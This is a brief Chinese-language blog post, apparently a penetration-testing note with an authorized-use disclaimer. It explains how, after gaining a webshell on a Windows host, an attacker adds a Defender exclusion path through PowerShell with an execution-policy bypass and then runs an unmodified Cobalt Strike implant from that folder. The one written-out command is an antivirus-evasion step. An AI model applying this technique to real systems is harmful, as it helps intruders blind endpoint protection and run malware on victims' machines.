免责声明
本文仅用于技术讨论与学习,利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。
只供对已授权的目标使用测试,对未授权目标的测试作者不承担责任,均由使用本人自行承担。
文章正文
偶然看到了通过powershell操作defender来添加排除项
https://docs.microsoft.com/en-us/powershell/module/defender/?view=windowsserver2019-ps
所以就有了这个场景:
假设我们拿到目标机器的webshell,对方开着Windows defender,在不会写免杀的情况下,上线CS:
添加排除项:
powershell -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath "C:\justtest"
CS生成一个普通的exe马:
上传到justtest目录:
运行:
上线:
